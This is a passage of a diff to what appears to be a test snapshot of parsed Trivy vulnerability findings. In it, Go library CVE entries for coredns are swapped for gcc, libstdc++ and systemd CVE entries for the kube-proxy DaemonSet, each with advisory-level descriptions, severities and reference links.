"scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "avoid quadratic complexity in HPACK decoding", + "name": "gcc: spilling of stack protection address in cfgexpand.c and function.c leads to stack-overflow protection bypass", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-41723", + "value": "https://avd.aquasec.com/nvd/cve-2018-12886", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-41723", + "value": "https://access.redhat.com/security/cve/CVE-2018-12886", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41723", + "value": "https://gcc.gnu.org/viewcvs/gcc/trunk/gcc/config/arm/arm-protos.h?revision=266379&view=markup", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-12886", }, { "type": "URL", - "value": "https://go.dev/cl/468135", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-12886", }, { "type": "URL", - "value": "https://go.dev/cl/468295", + "value": "https://www.gnu.org/software/gcc/gcc-8/changes.html", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-15847", + "installedVersion": "8.3.0-6", + "packageName": "libstdc++6", + "references": [ + "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00056.html", + "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00057.html", + "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00058.html", + "https://access.redhat.com/security/cve/CVE-2019-15847", + "https://gcc.gnu.org/bugzilla/show_bug.cgi?id=91481", + "https://linux.oracle.com/cve/CVE-2019-15847.html", + "https://linux.oracle.com/errata/ELSA-2020-1864.html", + "https://nvd.nist.gov/vuln/detail/CVE-2019-15847", + "https://www.cve.org/CVERecord?id=CVE-2019-15847", + ], + }, + "category": "Vulnerability", + "description": "The POWER9 backend in GNU Compiler Collection (GCC) before version 10 could optimize multiple calls of the __builtin_darn intrinsic into a single call, thus reducing the entropy of the random number generator. This occurred because a volatile operation was not specified. For example, within a single execution of a program, the output of every __builtin_darn() call may be the same.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "gcc: POWER9 "DARN" RNG intrinsic produces repeated output", + "references": [ { "type": "URL", - "value": "https://go.dev/issue/57855", + "value": "https://avd.aquasec.com/nvd/cve-2019-15847", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00056.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00057.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", + "value": "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00058.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", + "value": "https://access.redhat.com/security/cve/CVE-2019-15847", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", + "value": "https://gcc.gnu.org/bugzilla/show_bug.cgi?id=91481", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", + "value": "https://linux.oracle.com/cve/CVE-2019-15847.html", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2023-1571", + "value": "https://linux.oracle.com/errata/ELSA-2020-1864.html", }, { "type": "URL", - "value": "https://vuln.go.dev/ID/GO-2023-1571.json", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-15847", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-41723", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-15847", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.0.0-20210428140749-89ef3d95e781", - "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2021-31525", - "installedVersion": "v0.0.0-20200707034311-ab3426394381", - "packageName": "golang.org/x/net", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-3843", + "installedVersion": "241-7~deb10u7", + "packageName": "libsystemd0", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-31525", - "https://github.com/advisories/GHSA-h86h-8ppg-mxmh", - "https://github.com/golang/go/issues/45710", - "https://go.dev/cl/313069", - "https://go.dev/issue/45710", - "https://go.googlesource.com/net/+/89ef3d95e781148a0951956029c92a211477f7f9", - "https://groups.google.com/g/golang-announce/c/cu9SP4eSXMc", - "https://linux.oracle.com/cve/CVE-2021-31525.html", - "https://linux.oracle.com/errata/ELSA-2021-3076.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ISRZZ6NY5R2TBYE72KZFOCO25TEUQTBF/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-31525", - "https://pkg.go.dev/vuln/GO-2022-0236", - "https://security.gentoo.org/glsa/202208-02", - "https://www.cve.org/CVERecord?id=CVE-2021-31525", + "http://www.securityfocus.com/bid/108116", + "https://access.redhat.com/security/cve/CVE-2019-3843", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3843", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3843", + "https://github.com/systemd/systemd-stable/pull/54 (backport for v241-stable)", + "https://linux.oracle.com/cve/CVE-2019-3843.html", + "https://linux.oracle.com/errata/ELSA-2020-1794.html", + "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", + "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5JXQAKSTMABZ46EVCRMW62DHWYHTTFES/", + "https://nvd.nist.gov/vuln/detail/CVE-2019-3843", + "https://security.netapp.com/advisory/ntap-20190619-0002/", + "https://ubuntu.com/security/notices/USN-4269-1", + "https://usn.ubuntu.com/4269-1/", + "https://www.cve.org/CVERecord?id=CVE-2019-3843", ], }, "category": "Vulnerability", - "description": "net/http in Go before 1.15.12 and 1.16.x before 1.16.4 allows remote attackers to cause a denial of service (panic) via a large header to ReadRequest or ReadResponse. Server, Transport, and Client can each be affected in some configurations.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", + "description": "It was discovered that a systemd service that uses DynamicUser property can create a SUID/SGID binary that would be allowed to run as the transient service UID/GID even after the service is terminated. A local attacker may use this flaw to access resources that will be owned by a potentially different service in the future, when the UID/GID will be recycled.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "golang: net/http: panic in ReadRequest and ReadResponse when reading a very large header", + "name": "systemd: services with DynamicUser can create SUID/SGID binaries", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-31525", + "value": "https://avd.aquasec.com/nvd/cve-2019-3843", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-31525", + "value": "http://www.securityfocus.com/bid/108116", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-h86h-8ppg-mxmh", + "value": "https://access.redhat.com/security/cve/CVE-2019-3843", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/45710", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3843", }, { "type": "URL", - "value": "https://go.dev/cl/313069", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3843", }, { "type": "URL", - "value": "https://go.dev/issue/45710", + "value": "https://github.com/systemd/systemd-stable/pull/54 (backport for v241-stable)", }, { "type": "URL", - "value": "https://go.googlesource.com/net/+/89ef3d95e781148a0951956029c92a211477f7f9", + "value": "https://linux.oracle.com/cve/CVE-2019-3843.html", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/cu9SP4eSXMc", + "value": "https://linux.oracle.com/errata/ELSA-2020-1794.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-31525.html", + "value": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-3076.html", + "value": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ISRZZ6NY5R2TBYE72KZFOCO25TEUQTBF/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5JXQAKSTMABZ46EVCRMW62DHWYHTTFES/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-31525", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-3843", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0236", + "value": "https://security.netapp.com/advisory/ntap-20190619-0002/", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202208-02", + "value": "https://ubuntu.com/security/notices/USN-4269-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-31525", + "value": "https://usn.ubuntu.com/4269-1/", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-3843", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.4.0", - "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-41717", - "installedVersion": "v0.0.0-20200707034311-ab3426394381", - "packageName": "golang.org/x/net", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-3844", + "installedVersion": "241-7~deb10u7", + "packageName": "libsystemd0", "references": [ - "https://access.redhat.com/errata/RHSA-2023:2367", - "https://access.redhat.com/security/cve/CVE-2022-41717", - "https://bugzilla.redhat.com/2092793", - "https://bugzilla.redhat.com/2161274", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", - "https://errata.almalinux.org/9/ALSA-2023-2367.html", - "https://github.com/advisories/GHSA-xrjj-mj9h-534m", - "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", - "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", - "https://go.dev/cl/455635", - "https://go.dev/cl/455717", - "https://go.dev/issue/56350", - "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", - "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", - "https://linux.oracle.com/cve/CVE-2022-41717.html", - "https://linux.oracle.com/errata/ELSA-2023-2866.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", - "https://pkg.go.dev/vuln/GO-2022-1144", - "https://ubuntu.com/security/notices/USN-6038-1", - "https://www.cve.org/CVERecord?id=CVE-2022-41717", + "http://www.securityfocus.com/bid/108096", + "https://access.redhat.com/security/cve/CVE-2019-3844", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3844", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3844", + "https://linux.oracle.com/cve/CVE-2019-3844.html", + "https://linux.oracle.com/errata/ELSA-2020-1794.html", + "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", + "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2019-3844", + "https://security.netapp.com/advisory/ntap-20190619-0002/", + "https://ubuntu.com/security/notices/USN-4269-1", + "https://usn.ubuntu.com/4269-1/", + "https://www.cve.org/CVERecord?id=CVE-2019-3844", ], }, "category": "Vulnerability", - "description": "An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests. HTTP/2 server connections contain a cache of HTTP header keys sent by the client. While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", + "description": "It was discovered that a systemd service that uses DynamicUser property can get new privileges through the execution of SUID binaries, which would allow to create binaries owned by the service transient group with the setgid bit set. A local attacker may use this flaw to access resources that will be owned by a potentially different service in the future, when the GID will be recycled.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "excessive memory growth in a Go server accepting HTTP/2 requests", + "name": "systemd: services with DynamicUser can get new privileges and create SGID binaries", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-41717", + "value": "https://avd.aquasec.com/nvd/cve-2019-3844", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2367", + "value": "http://www.securityfocus.com/bid/108096", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-41717", + "value": "https://access.redhat.com/security/cve/CVE-2019-3844", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2092793", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3844", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2161274", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3844", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", + "value": "https://linux.oracle.com/cve/CVE-2019-3844.html", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/errata/ELSA-2020-1794.html", + }, + { + "type": "URL", + "value": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", + }, + { + "type": "URL", + "value": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-3844", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2367.html", + "value": "https://security.netapp.com/advisory/ntap-20190619-0002/", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-xrjj-mj9h-534m", + "value": "https://ubuntu.com/security/notices/USN-4269-1", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", + "value": "https://usn.ubuntu.com/4269-1/", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-3844", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "241-7~deb10u9", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-26604", + "installedVersion": "241-7~deb10u7", + "packageName": "libsystemd0", + "references": [ + "https://access.redhat.com/security/cve/CVE-2023-26604", + "https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-2-insecure-functionality/", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26604", + "https://github.com/systemd/systemd/blob/main/NEWS#L4335-L4340", + "https://github.com/systemd/systemd/issues/5666", + "https://lists.debian.org/debian-lts-announce/2023/03/msg00032.html", + "https://medium.com/@zenmoviefornotification/saidov-maxim-cve-2023-26604-c1232a526ba7", + "https://nvd.nist.gov/vuln/detail/CVE-2023-26604", + "https://security.netapp.com/advisory/ntap-20230505-0009/", + "https://www.cve.org/CVERecord?id=CVE-2023-26604", + ], + }, + "category": "Vulnerability", + "description": "systemd before 247 does not adequately block local privilege escalation for some Sudo configurations, e.g., plausible sudoers files in which the "systemctl status" command may be executed. Specifically, systemd does not set LESSSECURE to 1, and thus other programs may be launched from the less program. This presents a substantial security risk when running systemctl from Sudo, because less executes as root when the terminal size is too small to show the complete systemctl output.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "privilege escalation via the less pager", + "references": [ { "type": "URL", - "value": "https://go.dev/cl/455635", + "value": "https://avd.aquasec.com/nvd/cve-2023-26604", }, { "type": "URL", - "value": "https://go.dev/cl/455717", + "value": "https://access.redhat.com/security/cve/CVE-2023-26604", }, { "type": "URL", - "value": "https://go.dev/issue/56350", + "value": "https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-2-insecure-functionality/", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26604", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", + "value": "https://github.com/systemd/systemd/blob/main/NEWS#L4335-L4340", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-41717.html", + "value": "https://github.com/systemd/systemd/issues/5666", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2866.html", + "value": "https://lists.debian.org/debian-lts-announce/2023/03/msg00032.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", + "value": "https://medium.com/@zenmoviefornotification/saidov-maxim-cve-2023-26604-c1232a526ba7", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-1144", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-26604", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6038-1", + "value": "https://security.netapp.com/advisory/ntap-20230505-0009/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-41717", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-26604", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.0.0-20220412211240-33da011f77ad", - "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-29526", - "installedVersion": "v0.0.0-20201015000850-e3ed0017c211", - "packageName": "golang.org/x/sys", + "fixedVersion": "241-7~deb10u8", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-33910", + "installedVersion": "241-7~deb10u7", + "packageName": "libsystemd0", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-29526", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", - "https://github.com/advisories/GHSA-p782-xgp4-8hr8", - "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", - "https://github.com/golang/go/issues/52313", - "https://go.dev/cl/399539", - "https://go.dev/cl/400074", - "https://go.dev/issue/52313", - "https://groups.google.com/g/golang-announce", - "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", - "https://linux.oracle.com/cve/CVE-2022-29526.html", - "https://linux.oracle.com/errata/ELSA-2022-5337.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", - "https://pkg.go.dev/vuln/GO-2022-0493", - "https://security.gentoo.org/glsa/202208-02", - "https://security.netapp.com/advisory/ntap-20220729-0001/", - "https://ubuntu.com/security/notices/USN-6038-1", - "https://www.cve.org/CVERecord?id=CVE-2022-29526", + "http://packetstormsecurity.com/files/163621/Sequoia-A-Deep-Root-In-Linuxs-Filesystem-Layer.html", + "http://www.openwall.com/lists/oss-security/2021/08/04/2", + "http://www.openwall.com/lists/oss-security/2021/08/17/3", + "http://www.openwall.com/lists/oss-security/2021/09/07/3", + "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-33910.json", + "https://access.redhat.com/security/cve/CVE-2021-33910", + "https://cert-portal.siemens.com/productcert/pdf/ssa-222547.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33910", + "https://github.com/systemd/systemd-stable/commit/4a1c5f34bd3e1daed4490e9d97918e504d19733b", + "https://github.com/systemd/systemd-stable/commit/764b74113e36ac5219a4b82a05f311b5a92136ce", + "https://github.com/systemd/systemd-stable/commit/b00674347337b7531c92fdb65590ab253bb57538", + "https://github.com/systemd/systemd-stable/commit/cfd14c65374027b34dbbc4f0551456c5dc2d1f61", + "https://github.com/systemd/systemd/commit/b34a4f0e6729de292cb3b0c03c1d48f246ad896b", + "https://github.com/systemd/systemd/pull/20256/commits/441e0115646d54f080e5c3bb0ba477c892861ab9", + "https://linux.oracle.com/cve/CVE-2021-33910.html", + "https://linux.oracle.com/errata/ELSA-2021-2717.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2LSDMHAKI4LGFOCSPXNVVSEWQFAVFWR7/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-33910", + "https://security.gentoo.org/glsa/202107-48", + "https://security.netapp.com/advisory/ntap-20211104-0008/", + "https://ubuntu.com/security/notices/USN-5013-1", + "https://ubuntu.com/security/notices/USN-5013-2", + "https://www.cve.org/CVERecord?id=CVE-2021-33910", + "https://www.debian.org/security/2021/dsa-4942", + "https://www.openwall.com/lists/oss-security/2021/07/20/2", + "https://www.qualys.com/2021/07/20/cve-2021-33910/denial-of-service-systemd.txt", ], }, "category": "Vulnerability", - "description": "Go before 1.17.10 and 1.18.x before 1.18.2 has Incorrect Privilege Assignment. When called with a non-zero flags parameter, the Faccessat function could incorrectly report that a file is accessible.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", + "description": "basic/unit-name.c in systemd prior to 246.15, 247.8, 248.5, and 249.1 has a Memory Allocation with an Excessive Size Value (involving strdupa and alloca for a pathname controlled by a local attacker) that results in an operating system crash.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "faccessat checks wrong group", + "name": "systemd: uncontrolled allocation on the stack in function unit_name_path_escape leads to crash", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-29526", + "value": "https://avd.aquasec.com/nvd/cve-2021-33910", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-29526", + "value": "http://packetstormsecurity.com/files/163621/Sequoia-A-Deep-Root-In-Linuxs-Filesystem-Layer.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", + "value": "http://www.openwall.com/lists/oss-security/2021/08/04/2", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-p782-xgp4-8hr8", + "value": "http://www.openwall.com/lists/oss-security/2021/08/17/3", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", + "value": "http://www.openwall.com/lists/oss-security/2021/09/07/3", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/52313", + "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-33910.json", }, { "type": "URL", - "value": "https://go.dev/cl/399539", + "value": "https://access.redhat.com/security/cve/CVE-2021-33910", }, { "type": "URL", - "value": "https://go.dev/cl/400074", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-222547.pdf", }, { "type": "URL", - "value": "https://go.dev/issue/52313", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33910", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://github.com/systemd/systemd-stable/commit/4a1c5f34bd3e1daed4490e9d97918e504d19733b", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", + "value": "https://github.com/systemd/systemd-stable/commit/764b74113e36ac5219a4b82a05f311b5a92136ce", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-29526.html", + "value": "https://github.com/systemd/systemd-stable/commit/b00674347337b7531c92fdb65590ab253bb57538", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-5337.html", + "value": "https://github.com/systemd/systemd-stable/commit/cfd14c65374027b34dbbc4f0551456c5dc2d1f61", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", + "value": "https://github.com/systemd/systemd/commit/b34a4f0e6729de292cb3b0c03c1d48f246ad896b", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "value": "https://github.com/systemd/systemd/pull/20256/commits/441e0115646d54f080e5c3bb0ba477c892861ab9", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "value": "https://linux.oracle.com/cve/CVE-2021-33910.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "value": "https://linux.oracle.com/errata/ELSA-2021-2717.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2LSDMHAKI4LGFOCSPXNVVSEWQFAVFWR7/", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0493", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202208-02", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-33910", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220729-0001/", + "value": "https://security.gentoo.org/glsa/202107-48", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6038-1", + "value": "https://security.netapp.com/advisory/ntap-20211104-0008/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-29526", + "value": "https://ubuntu.com/security/notices/USN-5013-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5013-2", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-33910", + }, + { + "type": "URL", + "value": "https://www.debian.org/security/2021/dsa-4942", + }, + { + "type": "URL", + "value": "https://www.openwall.com/lists/oss-security/2021/07/20/2", + }, + { + "type": "URL", + "value": "https://www.qualys.com/2021/07/20/cve-2021-33910/denial-of-service-systemd.txt", }, ], "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "0.3.7", - "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2021-38561", - "installedVersion": "v0.3.3", - "packageName": "golang.org/x/text", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-3997", + "installedVersion": "241-7~deb10u7", + "packageName": "libsystemd0", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-38561", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38561", - "https://deps.dev/advisory/OSV/GO-2021-0113", - "https://github.com/advisories/GHSA-ppp9-7jff-5vj2", - "https://go.dev/cl/340830", - "https://go.googlesource.com/text/+/383b2e75a7a4198c42f8f87833eefb772868a56f", - "https://groups.google.com/g/golang-announce", - "https://nvd.nist.gov/vuln/detail/CVE-2021-38561", - "https://pkg.go.dev/golang.org/x/text/language", - "https://pkg.go.dev/vuln/GO-2021-0113", - "https://ubuntu.com/security/notices/USN-5873-1", - "https://www.cve.org/CVERecord?id=CVE-2021-38561", + "https://access.redhat.com/security/cve/CVE-2021-3997", + "https://bugzilla.redhat.com/show_bug.cgi?id=2024639", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3997", + 